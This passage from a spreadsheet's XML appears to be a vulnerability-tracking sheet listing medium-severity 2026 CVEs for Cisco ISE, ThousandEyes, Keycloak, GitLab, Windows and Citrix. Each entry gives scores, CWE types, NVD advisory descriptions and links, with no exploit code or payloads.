      <c r="J267" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr"/>
      <c r="Q267" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the certificate import functionality of the web-based management interface of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to read arbitrary files from the affected system. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to insufficient validation of user-supplied input by the affected feature. An attacker could exploit this vulnerability by sending a crafted request to the web-based management interface of an affected device. A successful exploit could allow the attacker to read arbitrary files from the affected device, which could contain sensitive information.</t>
        </is>
      </c>
      <c r="S267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76434</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76446</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="inlineStr"/>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr"/>
      <c r="Q268" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in an API of Cisco ISE and Cisco ISE-PIC could allow an authenticated, remote attacker to read specific&amp;nbsp;files on the underlying operating system of an affected device.
This vulnerability is due to improper restriction of XML external entity references. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to read specific&amp;nbsp;files on the affected system that the underlying process has permission to access.</t>
        </is>
      </c>
      <c r="S268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76446</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76448</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="inlineStr"/>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr"/>
      <c r="Q269" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76448</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76449</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="inlineStr"/>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr"/>
      <c r="Q270" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76449</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76450</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="inlineStr"/>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K271" s="5" t="inlineStr"/>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr"/>
      <c r="Q271" s="5" t="inlineStr">
        <is>
          <t>CWE-564</t>
        </is>
      </c>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76450</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76451</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="inlineStr"/>
      <c r="I272" s="5" t="inlineStr"/>
      <c r="J272" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K272" s="5" t="inlineStr"/>
      <c r="L272" s="5" t="inlineStr"/>
      <c r="M272" s="5" t="inlineStr"/>
      <c r="N272" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O272" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P272" s="5" t="inlineStr"/>
      <c r="Q272" s="5" t="inlineStr">
        <is>
          <t>CWE-564</t>
        </is>
      </c>
      <c r="R272" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC) could allow an authenticated, remote attacker to conduct an SQL or HQL injection attack on an affected device.
This vulnerability is due to insufficient validation of user-supplied input to the affected APIs before it is used to build database queries. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to execute arbitrary SQL or HQL queries against the underlying database, which could allow the attacker to view or modify data that they are not authorized to access. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76451</t>
        </is>
      </c>
    </row>
    <row r="273">
      <c r="A273" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B273" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C273" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89298</t>
        </is>
      </c>
      <c r="D273" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E273" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F273" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G273" s="5" t="inlineStr"/>
      <c r="H273" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I273" s="5" t="inlineStr"/>
      <c r="J273" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K273" s="5" t="inlineStr"/>
      <c r="L273" s="5" t="inlineStr"/>
      <c r="M273" s="5" t="inlineStr"/>
      <c r="N273" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O273" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P273" s="5" t="inlineStr"/>
      <c r="Q273" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R273" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the Dynamic Client Registration service of Keycloak, an open-source identity and access management solution. The issue occurs when a user with the view-clients role accesses the client registration endpoint to retrieve client details. Due to a failure to mask sensitive information, the service returns the client's confidential secret in cleartext. This could allow a read-only administrator to obtain full access to the affected client's account and potentially escalate their privileges within the realm.</t>
        </is>
      </c>
      <c r="S273" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89298</t>
        </is>
      </c>
    </row>
    <row r="274">
      <c r="A274" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B274" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C274" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19619</t>
        </is>
      </c>
      <c r="D274" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E274" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F274" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G274" s="5" t="inlineStr"/>
      <c r="H274" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I274" s="5" t="inlineStr"/>
      <c r="J274" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K274" s="5" t="inlineStr"/>
      <c r="L274" s="5" t="inlineStr"/>
      <c r="M274" s="5" t="inlineStr"/>
      <c r="N274" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O274" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P274" s="5" t="inlineStr"/>
      <c r="Q274" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R274" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab CE/EE affecting all versions from 19.0 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that under certain conditions could have allowed an unauthenticated user to execute arbitrary JavaScript in the context of a targeted user's session due to improper sanitization of pasted HTML content in the Content Editor.</t>
        </is>
      </c>
      <c r="S274" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19619</t>
        </is>
      </c>
    </row>
    <row r="275">
      <c r="A275" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B275" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C275" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20350</t>
        </is>
      </c>
      <c r="D275" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E275" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G275" s="5" t="inlineStr"/>
      <c r="H275" s="5" t="inlineStr"/>
      <c r="I275" s="5" t="inlineStr"/>
      <c r="J275" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K275" s="5" t="inlineStr"/>
      <c r="L275" s="5" t="inlineStr"/>
      <c r="M275" s="5" t="inlineStr"/>
      <c r="N275" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O275" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P275" s="5" t="inlineStr"/>
      <c r="Q275" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R275" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ThousandEyes Virtual Appliance could allow an authenticated, remote attacker to inject arbitrary operating system commands.
This vulnerability is due to improper validation of user-supplied input to the web-based management interface. An attacker could exploit this vulnerability by saving configuration details that contain malicious values. A successful exploit could allow the attacker to execute arbitrary operating system commands with root privileges. To exploit this vulnerability, the attacker must have valid administrative credentials.</t>
        </is>
      </c>
      <c r="S275" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20350</t>
        </is>
      </c>
    </row>
    <row r="276">
      <c r="A276" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B276" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C276" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="D276" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E276" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F276" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G276" s="5" t="inlineStr"/>
      <c r="H276" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I276" s="5" t="inlineStr"/>
      <c r="J276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K276" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L276" s="5" t="inlineStr"/>
      <c r="M276" s="5" t="inlineStr"/>
      <c r="N276" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O276" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P276" s="5" t="inlineStr"/>
      <c r="Q276" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R276" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S276" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="277">
      <c r="A277" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B277" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C277" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69832</t>
        </is>
      </c>
      <c r="D277" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E277" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G277" s="5" t="inlineStr"/>
      <c r="H277" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I277" s="5" t="inlineStr"/>
      <c r="J277" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K277"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277" s="5" t="inlineStr"/>
      <c r="M277" s="5" t="inlineStr"/>
      <c r="N277" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O277" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P277" s="5" t="inlineStr"/>
      <c r="Q277" s="5" t="inlineStr">
        <is>
          <t>CWE-497</t>
        </is>
      </c>
      <c r="R277" s="5" t="inlineStr">
        <is>
          <t>Exposure of sensitive system information to an unauthorized control sphere in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S277" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69832</t>
        </is>
      </c>
    </row>
    <row r="278">
      <c r="A278" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B278" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C278" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="D278" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E278" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F278" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G278" s="5" t="inlineStr"/>
      <c r="H278" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I278" s="5" t="inlineStr"/>
      <c r="J278" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K278"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278" s="5" t="inlineStr"/>
      <c r="M278" s="5" t="inlineStr"/>
      <c r="N278" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O278" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P278" s="5" t="inlineStr"/>
      <c r="Q278" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="R278" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S278" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="279">
      <c r="A279" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B279" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C279" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="D279" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="E279" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F279" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G279" s="5" t="inlineStr"/>
      <c r="H279" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I279" s="5" t="inlineStr"/>
      <c r="J279" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K279"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279" s="5" t="inlineStr"/>
      <c r="M279" s="5" t="inlineStr"/>
      <c r="N279" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O279" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P279" s="5" t="inlineStr"/>
      <c r="Q279" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R279" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="S279" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="280">
      <c r="A280" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B280" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C280" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69548</t>
        </is>
      </c>
      <c r="D280" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="E280" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F280" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G280" s="5" t="inlineStr"/>
      <c r="H280" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I280" s="5" t="inlineStr"/>
      <c r="J280" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K280"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280" s="5" t="inlineStr"/>
      <c r="M280" s="5" t="inlineStr"/>
      <c r="N280" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O280" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P280" s="5" t="inlineStr"/>
      <c r="Q280" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R280" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to disclose information with a physical attack.</t>
        </is>
      </c>
      <c r="S280" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69548</t>
        </is>
      </c>
    </row>
    <row r="281">
      <c r="A281" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B281" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C281" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78547</t>
        </is>
      </c>
      <c r="D281" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E281" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F281" s="5" t="inlineStr">
        <is>
          <t>secure@citrix.com</t>
        </is>
      </c>
      <c r="G281" s="5" t="inlineStr"/>
      <c r="H281" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I281" s="5" t="inlineStr"/>
      <c r="J281" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K281" s="5" t="inlineStr"/>
      <c r="L281" s="5" t="inlineStr"/>
      <c r="M281" s="5" t="inlineStr"/>
      <c r="N281" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O281" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P281" s="5" t="inlineStr"/>
      <c r="Q281" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R281" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability in Citrix Citrix Workspace app for Windows.
This issue affects Citrix Workspace app for Windows: before 2603.11 Current Release (CR), before 2507.1 LTSR CU3, and before LTSR 2607.</t>
        </is>
      </c>
      <c r="S281" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78547</t>
        </is>
      </c>
    </row>
    <row r="282">
      <c r="A282" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B282" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C282" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86341</t>
        </is>
      </c>
      <c r="D282" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E282" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F282" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G282" s="5" t="inlineStr"/>
      <c r="H282" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I282" s="5" t="inlineStr"/>
      <c r="J282" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K282" s="5" t="inlineStr"/>
      <c r="L282" s="5" t="inlineStr"/>
      <c r="M282" s="5" t="inlineStr"/>
      <c r="N282" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O282" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P282" s="5" t="inlineStr"/>
      <c r="Q282" s="5" t="inlineStr">
        <is>
          <t>CWE-1280</t>
        </is>
      </c>
      <c r="R282" s="5" t="inlineStr">
        <is>
          <t>GitLab has remediated an issue in GitLab EE affecting all versions from 17.1 before 19.1.8, 19.2 before 19.2.6, and 19.3 before 19.3.2 that, under certain conditions, an authenticated user with Owner or Maintainer permissions could have silently disabled protected environment deployment approval requirements, allowing unapproved deployments to reach production, due to improper access control checks performed after the protected resource was modified.</t>
        </is>
      </c>
      <c r="S282" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86341</t>
        </is>
      </c>
    </row>
    <row r="283">
      <c r="A283" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B283" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C283" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16794</t>
        </is>
      </c>
      <c r="D283" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E283" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F283" s="5" t="inlineStr">
        <is>
          <t>cve@gitlab.com</t>
        </is>
      </c>
      <c r="G283" s="5" t="inlineStr"/>
      <c r="H283" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I283" s="5" t="inlineStr"/>
      <c r="J283" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K283" s="5" t="inlineStr"/>
      <c r="L283" s="5" t="inlineStr"/>
      <c r="M283" s="5" t="inlineStr"/>
      <c r="N283" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O283" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
